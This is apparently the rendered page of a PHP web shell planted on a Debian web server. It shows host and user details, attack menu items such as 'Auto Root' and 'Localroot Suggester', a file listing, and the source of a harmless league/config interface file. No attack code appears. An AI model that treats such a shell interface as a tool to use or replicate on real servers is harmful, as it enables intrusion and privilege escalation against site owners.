Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
softmedya.net /
vendor /
league /
config /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
Exception
[ DIR ]
drwxr-xr-x
2022-12-11 20:36
Configuration.php
6.33
KB
-rw-r--r--
2022-12-11 20:36
ConfigurationAwareInterface.php
516
B
-rw-r--r--
2022-12-11 20:36
ConfigurationBuilderInterface.php
498
B
-rw-r--r--
2022-12-11 20:36
ConfigurationInterface.php
1.15
KB
-rw-r--r--
2022-12-11 20:36
ConfigurationProviderInterface.php
485
B
-rw-r--r--
2022-12-11 20:36
MutableConfigurationInterface.php
818
B
-rw-r--r--
2022-12-11 20:36
ReadOnlyConfiguration.php
802
B
-rw-r--r--
2022-12-11 20:36
SchemaBuilderInterface.php
586
B
-rw-r--r--
2022-12-11 20:36
Save
Rename
<?php declare(strict_types=1); /* * This file is part of the league/config package. * * (c) Colin O'Dell <colinodell@gmail.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace League\Config; use League\Config\Exception\UnknownOptionException; use League\Config\Exception\ValidationException; /** * Interface for reading configuration values */ interface ConfigurationInterface { /** * @param string $key Configuration option path/key * * @psalm-param non-empty-string $key * * @return mixed * * @throws ValidationException if the schema failed to validate the given input * @throws UnknownOptionException if the requested key does not exist or is malformed */ public function get(string $key); /** * @param string $key Configuration option path/key * * @psalm-param non-empty-string $key * * @return bool Whether the given option exists * * @throws ValidationException if the schema failed to validate the given input */ public function exists(string $key): bool; }